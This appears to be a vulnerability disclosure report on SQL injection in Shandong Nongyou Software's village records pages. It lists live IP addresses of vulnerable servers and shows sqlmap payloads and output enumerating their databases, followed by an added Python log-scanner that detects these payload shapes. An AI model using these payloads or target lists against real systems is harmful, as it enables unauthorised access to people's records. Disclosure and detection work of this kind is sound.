### Brief description:

As the title says.

### Details:

Official website of Shandong Nongyou Software Co.: http://www.nongyou.com.cn/

Both parameters, tname and CountryName, are injectable.

Examples:

http://218.56.99.84:8003/newSymSum/VillagePersonal2.aspx?tname=太河镇&CountryName=东同古村
http://222.135.109.70:8200/newSymSum/VillagePersonal2.aspx?tname=泽库镇&CountryName=辛立庄村
http://123.134.189.60:8022/newSymSum/VillagePersonal2.aspx?tname=牛泉镇&CountryName=西泉河
http://222.135.76.147:8200/newSymSum/VillagePersonal2.aspx?tname=斥山办事处&CountryName=西苏家村
http://218.58.124.131:8003/newSymSum/VillagePersonal2.aspx?tname=中央商务片区&CountryName=魏家社区
http://218.56.40.229:8037/newSymSum/VillagePersonal2.aspx?tname=毕郭镇&CountryName=庙子夼村

1. Test the injection point: http://218.56.40.229:8037/newSymSum/VillagePersonal2.aspx?tname=毕郭镇&CountryName=庙子夼村

![1.png](https://images.seebug.org/upload/201412/31164230b7c29c9af24c38707734f299acb21c44.png)

```
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: tname
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tname=???' AND 3360=3360 AND 'AunX'='AunX&CountryName=????

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: tname=???' AND (SELECT 4079 FROM(SELECT COUNT(*),CONCAT(0x7175657371,(SELECT (CASE WHEN (4079=4079) THEN 1 ELSE 0 END)),0x716f676a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'MnDW'='MnDW&CountryName=????

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: tname=???'; SELECT SLEEP(5)-- &CountryName=????

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: tname=???' AND SLEEP(5) AND 'nhiY'='nhiY&CountryName=????
---
[16:41:05] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: MySQL 5.0
[16:41:05] [INFO] fetching database names
[16:41:35] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[16:41:43] [INFO] the SQL query used returns 5503 entries
[16:41:43] [INFO] retrieved: information_schema
[16:41:45] [INFO] retrieved: commoa
[16:41:46] [INFO] retrieved: commoa100001
[16:41:46] [INFO] retrieved: commoa100002
[16:41:47] [INFO] retrieved: commoa100003
[16:41:47] [INFO] retrieved: commoa100004
[16:41:48] [INFO] retrieved: commoa100005
[16:41:48] [INFO] retrieved: commoa100006
[16:41:48] [INFO] retrieved: commoa100007
[16:41:49] [INFO] retrieved: commoa100008
[16:41:49] [INFO] retrieved: commoa100009
[16:41:49] [INFO] retrieved: commoa100010
[16:41:50] [INFO] retrieved: commoa100011
[16:41:50] [INFO] retrieved: commoa100012
[16:41:51] [INFO] retrieved: commoa100013
[16:41:51] [INFO] retrieved: commoa100014
[16:41:51] [INFO] retrieved: commoa100015
[16:41:52] [INFO] retrieved: commoa100016
[16:41:52] [INFO] retrieved: commoa100017
[16:41:52] [INFO] retrieved: commoa100018
[16:41:53] [INFO] retrieved: commoa100019
[16:41:53] [INFO] retrieved: commoa100020
[16:41:55] [INFO] retrieved: commoa100021
[16:41:56] [INFO] retrieved: commoa100022
[16:41:56] [INFO] retrieved: commoa100023
[16:41:57] [INFO] retrieved: commoa100024
[16:41:57] [INFO] retrieved: commoa100025
[16:41:57] [INFO] retrieved: commoa100026
[16:41:58] [INFO] retrieved: commoa100027
[16:41:58] [INFO] retrieved: commoa100028
[16:41:59] [INFO] retrieved: commoa100029
[16:41:59] [INFO] retrieved: commoa100030
[16:41:59] [INFO] retrieved: commoa100031
[16:42:00] [INFO] retrieved: commoa100032
[16:42:00] [INFO] retrieved: commoa100033
[16:42:00] [INFO] retrieved: commoa100034
[16:42:01] [INFO] retrieved: commoa100035
[16:42:01] [INFO] retrieved: commoa100036
[16:42:02] [INFO] retrieved: commoa100037
[16:42:02] [INFO] retrieved: commoa100038
[16:42:02] [INFO] retrieved: commoa100039
[16:42:03] [INFO] retrieved: commoa100040
[16:42:03] [INFO] retrieved: commoa100041
[16:42:04] [INFO] retrieved: commoa100042
[16:42:04] [INFO] retrieved: commoa100043
[16:42:04] [INFO] retrieved: commoa100044
[16:42:05] [INFO] retrieved: commoa100045
[16:42:05] [INFO] retrieved: commoa100046
[16:42:07] [INFO] retrieved: commoa100047
[16:42:08] [INFO] retrieved: commoa100048
[16:42:08] [INFO] retrieved: commoa100049
[16:42:08] [INFO] retrieved: commoa100050
[16:42:09] [INFO] retrieved: commoa100051
[16:42:09] [INFO] retrieved: commoa100052
[16:42:10] [INFO] retrieved: commoa100053
[16:42:10] [INFO] retrieved: commoa100054
[16:42:12] [WARNING] user aborted during enumeration. sqlmap will display partial output
available databases [56]:
[*] commoa
[*] commoa100001
[*] commoa100002
[*] commoa100003
[*] commoa100004
[*] commoa100005
[*] commoa100006
[*] commoa100007
[*] commoa100008
[*] commoa100009
[*] commoa100010
[*] commoa100011
[*] commoa100012
[*] commoa100013
[*] commoa100014
[*] commoa100015
[*] commoa100016
[*] commoa100017
[*] commoa100018
[*] commoa100019
[*] commoa100020
[*] commoa100021
[*] commoa100022
[*] commoa100023
[*] commoa100024
[*] commoa100025
[*] commoa100026
[*] commoa100027
[*] commoa100028
[*] commoa100029
[*] commoa100030
[*] commoa100031
[*] commoa100032
[*] commoa100033
[*] commoa100034
[*] commoa100035
[*] commoa100036
[*] commoa100037
[*] commoa100038
[*] commoa100039
[*] commoa100040
[*] commoa100041
[*] commoa100042
[*] commoa100043
[*] commoa100044
[*] commoa100045
[*] commoa100046
[*] commoa100047
[*] commoa100048
[*] commoa100049
[*] commoa100050
[*] commoa100051
[*] commoa100052
[*] commoa100053
[*] commoa100054
[*] information_schema
```

Over 5,000 tables, so I did not run the enumeration to completion. I only tested this one instance; all the others are reproducible.

-------------------------------------------------------------------

Second injection point:
http://218.58.124.131:8003/newSymSum/VillagePersonal3.aspx?tname=先进装备制造产业片区&CountryName=郭家村
http://222.135.76.147:8200/newSymSum/VillagePersonal3.aspx?tname=港西镇&CountryName=山后鞠家村
http://60.217.72.17:7081/newSymSum/VillagePersonal3.aspx?tname=新市镇&CountryName=王大褂村
http://222.135.109.70:8200/newSymSum/VillagePersonal3.aspx?tname=龙山办事处&CountryName=西楼
http://218.56.40.229:8053/newSymSum/VillagePersonal3.aspx?tname=城港路街道&CountryName=三间房
http://221.2.149.47:8200/newSymSum/VillagePersonal3.aspx?tname=滕家镇&CountryName=曹家沟

1. Test the injection point: http://218.58.124.131:8003/newSymSum/VillagePersonal3.aspx?tname=先进装备制造产业片区&CountryName=郭家村

![2.png](https://images.seebug.org/upload/201412/311648048f13bed0fbf92ba0219b4027b4e41442.png)

```
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: tname
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tname=??????????' AND 7785=7785 AND 'FAej'='FAej&CountryName=???

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: tname=??????????' AND (SELECT 8399 FROM(SELECT COUNT(*),CONCAT(0x7162797171,(SELECT (CASE WHEN (8399=8399) THEN 1 ELSE 0 END)),0x716f617271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Ovog'='Ovog&CountryName=???

    Type: stacked queries
    Title: MySQL < 5.0.12 stacked queries (heavy query)
    Payload: tname=??????????'; SELECT BENCHMARK(5000000,MD5(0x72546e68))-- &CountryName=???

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: tname=??????????' AND 2926=BENCHMARK(5000000,MD5(0x71496377)) AND 'qbiT'='qbiT&CountryName=???
---
[16:47:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: MySQL 5.0
[16:47:55] [INFO] fetching database names
[16:47:55] [INFO] the SQL query used returns 17 entries
[16:47:55] [INFO] retrieved: information_schema
[16:47:55] [INFO] retrieved: cw_databasecomm0517
[16:47:55] [INFO] retrieved: cw_databasecomm22zbgaoxin
[16:47:55] [INFO] retrieved: cw_databasecommxh
[16:47:56] [INFO] retrieved: cw_databasezbgx
[16:47:56] [INFO] retrieved: cwdbcommzbgx100001
[16:47:56] [INFO] retrieved: cwdbcommzbgx100002
[16:47:56] [INFO] retrieved: cwdbcommzbgx100003
[16:47:56] [INFO] retrieved: cwdbcommzbgx100004
[16:47:56] [INFO] retrieved: cwdbcommzbgx100005
[16:47:56] [INFO] retrieved: cwdbcommzbgx100007
[16:47:56] [INFO] retrieved: mysql
[16:47:56] [INFO] retrieved: nl_zbgaoxin
[16:47:56] [INFO] retrieved: ny_landgxlz
[16:47:56] [INFO] retrieved: test
[16:47:56] [INFO] retrieved: village-levelmajor33zbgaoxin
[16:47:56] [INFO] retrieved: village-levelmajor33zbgaoxinqu
available databases [17]:
[*] cw_databasecomm0517
[*] cw_databasecomm22zbgaoxin
[*] cw_databasecommxh
[*] cw_databasezbgx
[*] cwdbcommzbgx100001
[*] cwdbcommzbgx100002
[*] cwdbcommzbgx100003
[*] cwdbcommzbgx100004
[*] cwdbcommzbgx100005
[*] cwdbcommzbgx100007
[*] information_schema
[*] mysql
[*] nl_zbgaoxin
[*] ny_landgxlz
[*] test
[*] village-levelmajor33zbgaoxin
[*] village-levelmajor33zbgaoxinqu
```

All of the above are reproducible.

### Proof of vulnerability:

![2.png](https://images.seebug.org/upload/201412/311648048f13bed0fbf92ba0219b4027b4e41442.png)
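Detection logic for the request shapes the sqlmap output above lists (boolean-based, error-based, stacked and time-based payloads in tname and CountryName), as an added example that is not part of the original report: it scans IIS W3C log lines for the VillagePersonal pages and names the technique each parameter value matches. The log field order, the signature names and the sample lines are assumptions constructed here.

```python
import re
from urllib.parse import parse_qs

# Signatures for the four sqlmap techniques listed in the report: boolean-based
# blind, error-based (the FLOOR(RAND(0)*2) trick), stacked queries, time-based.
SIGNATURES = {
    "boolean-tautology": re.compile(r"'\s*AND\s+(\d+)=\1\b", re.I),
    "error-based": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "stacked-query": re.compile(r"'\s*;\s*(SELECT|INSERT|UPDATE|DELETE)\b", re.I),
    "time-based": re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I),
}
WATCHED_PARAMS = ("tname", "CountryName")
WATCHED_STEM = "/newsymsum/villagepersonal"  # covers VillagePersonal2/3.aspx

def classify(value):
    """Name the techniques whose signature matches one decoded parameter value."""
    hits = [name for name, rx in SIGNATURES.items() if rx.search(value)]
    # A town or village name never legitimately contains a quote; a bare quote is
    # the first probe sqlmap sends, so flag it even without a full payload.
    if not hits and "'" in value:
        hits.append("quote-probe")
    return hits

def scan_iis_log(lines):
    """Scan W3C log lines (assumed fields: date time cs-uri-stem cs-uri-query c-ip)
    and return one (client_ip, parameter, techniques) tuple per suspicious value."""
    findings = []
    for line in lines:
        fields = line.split()
        if line.startswith("#") or len(fields) < 5:
            continue  # directive/header line or malformed line
        _date, _time, stem, query, client_ip = fields[:5]
        if not stem.lower().startswith(WATCHED_STEM) or query == "-":
            continue
        params = parse_qs(query, keep_blank_values=True)  # also URL-decodes
        for name in WATCHED_PARAMS:
            for value in params.get(name, []):
                hits = classify(value)
                if hits:
                    findings.append((client_ip, name, hits))
    return findings

# Constructed sample log: one legitimate lookup, then the report's boolean-based,
# stacked and time-based payload shapes, URL-encoded the way IIS records them.
SAMPLE_LOG = """#Fields: date time cs-uri-stem cs-uri-query c-ip
2014-12-31 16:41:05 /newSymSum/VillagePersonal2.aspx tname=%E6%AF%95%E9%83%AD%E9%95%87&CountryName=%E5%BA%99%E5%AD%90%E5%A4%BC%E6%9D%91 203.0.113.5
2014-12-31 16:41:06 /newSymSum/VillagePersonal2.aspx tname=%E6%AF%95%E9%83%AD%E9%95%87%27%20AND%203360%3D3360%20AND%20%27AunX%27%3D%27AunX&CountryName=x 203.0.113.9
2014-12-31 16:41:07 /newSymSum/VillagePersonal2.aspx tname=x%27%3B%20SELECT%20SLEEP(5)--%20&CountryName=x 203.0.113.9
2014-12-31 16:41:08 /newSymSum/VillagePersonal3.aspx tname=x&CountryName=x%27%20AND%202926%3DBENCHMARK(5000000%2CMD5(0x71496377))%20AND%20%27qbiT%27%3D%27qbiT 203.0.113.9
"""
```

Running `scan_iis_log(SAMPLE_LOG.splitlines())` flags the three probing requests from 203.0.113.9 and leaves the legitimate lookup alone; a real deployment would feed it the server's actual log and group findings by client address.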